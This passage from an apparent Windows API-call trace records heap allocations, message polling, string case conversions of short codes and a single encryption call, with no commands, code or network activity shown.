cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.240] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a7eb0*, pdwDataLen=0x8bef68*=0x1f6a, dwBufLen=0x1f70 | out: pbData=0x34a7eb0*, pdwDataLen=0x8bef68*=0x1f70) returned 1 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0196.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.242] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.243] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.243] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.243] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.243] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.243] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.243] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.243] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.243] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.244] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.244] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.244] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.244] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.244] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.244] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.245] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.245] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.247] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.247] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.247] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0196.247] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.247] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0196.248] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.248] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.248] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.248] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.248] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.248] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.248] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.249] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.250] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.250] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.250] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.292] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.293] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.293] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.293] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.293] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0196.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.294] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.294] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.294] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.295] HeapFree (in: 